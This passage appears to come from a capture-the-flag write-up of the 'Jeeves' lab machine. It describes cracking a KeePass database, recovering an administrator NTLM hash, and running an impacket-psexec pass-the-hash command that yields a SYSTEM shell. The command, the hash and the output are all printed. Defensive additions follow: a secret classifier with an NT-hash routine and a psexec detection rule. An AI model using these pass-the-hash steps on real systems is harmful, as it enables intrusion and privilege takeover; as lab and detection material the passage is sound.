CLEARTEXT Credential
After gaining initial access to the target as the kohsuke user, a KeePass database file was discovered. Although the database itself is properly encrypted, a weak master password made cracking the extracted master-key hash straightforward, ultimately resulting in the compromise of the KeePass database.
A total of 8 entries are present
Backup stuff
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
One of them caught my eye, as it contains what appears to be an NTLM hash, judging by the format <LMHASH>:<NTHASH>.
Given the entry is titled Backup stuff, it might well belong to the administrator user.
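To make the format argument concrete from a defender's side, the following added example (not code from the original writeup) classifies a stored secret as an LM:NT pair, a bare 32-hex digest, or plaintext, and flags the well-known empty-LM constant that fills the first half when LM storage is disabled. It also includes a pure-Python MD4 so that it can show why an NT hash is password-equivalent: NT = MD4(UTF-16LE(password)), unsalted, which is exactly why such an entry in a password manager must be handled as a cleartext credential. The helper names and the plaintext sample value are my own; the LM:NT string is the one found in the database above.

```python
import re
import struct

# LM hash of the empty password: what the LM field contains when LM storage is
# disabled (the default on current Windows). Its presence is a strong hint that a
# 32:32 hex string is an LM:NT pair rather than two unrelated digests.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
_HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def classify_secret(value: str) -> dict:
    """Classify a stored secret: LM:NT pair, bare 32-hex digest, or plaintext.

    Intended for scanning password-manager exports or notes for password-equivalent
    material that was pasted in as if it were an ordinary note.
    """
    parts = value.strip().split(":")
    if len(parts) == 2 and all(_HEX32.match(p) for p in parts):
        lm, nt = (p.lower() for p in parts)
        return {"kind": "lm_nt_pair", "lm": lm, "nt": nt, "lm_disabled": lm == EMPTY_LM}
    if len(parts) == 1 and _HEX32.match(parts[0]):
        # A lone 32-hex digest could be NT or MD5; format alone cannot tell them apart.
        return {"kind": "hash32", "digest": parts[0].lower()}
    return {"kind": "plaintext"}


def _rotl(x: int, s: int) -> int:
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF


def _md4_block(state, block: bytes):
    """One MD4 compression round over a 64-byte block (RFC 1320)."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(16):                                   # round 1: F = (b & c) | (~b & d)
        a = _rotl((a + ((b & c) | (~b & d)) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                   # round 2: G = majority(b, c, d)
        k = (i % 4) * 4 + i // 4
        a = _rotl((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & 0xFFFFFFFF,
                  (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                   # round 3: H = b ^ c ^ d
        k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
        a = _rotl((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    """MD4 digest, implemented here because hashlib often lacks MD4 on OpenSSL 3."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        state = _md4_block(state, data[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 over the UTF-16LE password, hence password-equivalent."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    found = "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00"
    print(classify_secret(found))
    print(nt_hash("password"))  # well-known vector: 8846f7eaee8fb117ad06bdd830b7586c
```

Because the NT hash has no salt and no per-user secret, two accounts with the same password share the same NT hash and the hash alone is enough to authenticate over NTLM; a secret scanner that sees `lm_nt_pair` in a note field should raise it with the same severity as a plaintext administrator password.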
Pass The Hash
┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ impacket-psexec administrator:@$IP -no-pass -hashes 'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file iBnyQdZh.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service XArU on 10.10.10.63.....
[*] Starting service XArU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Jeeves
c:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.63
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{4079b648-26d5-4a56-9108-2a55ec5ce6ca}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix . :
System Level Compromise
The theory was correct: the hash belongs to the administrator user.
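The psexec session above leaves a distinctive trail on the target: an executable with a random name (iBnyQdZh.exe) is written to ADMIN$, and seconds later a service with a short random name (XArU) is installed whose binary lives directly under the Windows directory. The following added example (not from the original writeup) correlates those two events in the way a detection engineer would: a Security event 5145 recording a write to ADMIN$, followed within a minute by a System event 7045 installing a service from that same file on the same host. The event records are simplified to the fields the rule needs, the sample events are constructed, and the source address 10.10.14.5 is an assumed value; the service name, file name and host name are the ones seen on the page.

```python
import re

# Constructed sample events (not real logs), reduced to the fields the rule uses.
# The first two mirror what the psexec run leaves behind; the rest are benign noise.
SAMPLE_EVENTS = [
    {"ts": 1000, "id": 5145, "host": "Jeeves", "src": "10.10.14.5",   # src is assumed
     "share": r"\\*\ADMIN$", "target": "iBnyQdZh.exe", "access": 0x2},
    {"ts": 1002, "id": 7045, "host": "Jeeves", "service": "XArU",
     "image": r"%SystemRoot%\iBnyQdZh.exe", "account": "LocalSystem"},
    {"ts": 5000, "id": 5145, "host": "Jeeves", "src": "10.10.10.50",   # read, not write
     "share": r"\\*\ADMIN$", "target": r"Temp\report.txt", "access": 0x1},
    {"ts": 9000, "id": 7045, "host": "Jeeves", "service": "Spooler",   # binary under System32
     "image": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"ts": 9100, "id": 7045, "host": "Jeeves", "service": "WinDefend",
     "image": r"C:\Program Files\Windows Defender\MsMpEng.exe", "account": "LocalSystem"},
]

WRITE_DATA = 0x2        # AccessMask bit for WriteData / AddFile in event 5145
WINDOW_SECONDS = 60     # upload and service creation happen within seconds of each other
# Short all-letter service name and an .exe dropped straight into the share root
# (ADMIN$ maps to %SystemRoot%), as in the session above.
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4,8}$")
ROOT_IMAGE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\([A-Za-z]{4,12}\.exe)$", re.IGNORECASE)


def admin_share_writes(events):
    """Yield 5145 events that wrote a file to ADMIN$ (any host)."""
    for e in events:
        if e["id"] == 5145 and e["share"].upper().endswith("ADMIN$") and e["access"] & WRITE_DATA:
            yield e


def detect_psexec(events):
    """Correlate a service install from the Windows root with a preceding ADMIN$ write
    of the same file on the same host. Returns one alert per matching pair."""
    writes = list(admin_share_writes(events))
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        m = ROOT_IMAGE.match(svc["image"])
        if not m or not RANDOM_SERVICE.match(svc["service"]):
            continue
        binary = m.group(1).lower()
        for w in writes:
            if (w["host"] == svc["host"] and w["target"].lower() == binary
                    and 0 <= svc["ts"] - w["ts"] <= WINDOW_SECONDS):
                alerts.append({"host": svc["host"], "service": svc["service"],
                               "binary": binary, "src": w["src"],
                               "reason": "service installed from file just written to ADMIN$"})
    return alerts


if __name__ == "__main__":
    for alert in detect_psexec(SAMPLE_EVENTS):
        print(alert)
```

The correlation is what keeps the rule quiet: a random-looking service name alone, or a write to ADMIN$ alone, both occur in legitimate administration, but a service whose binary was written over SMB moments earlier is the psexec pattern regardless of which tool produced it. On the prevention side, the same session shows why the stored hash must be treated as the administrator's password: rotating that password invalidates the NT hash, whereas deleting the KeePass entry does not.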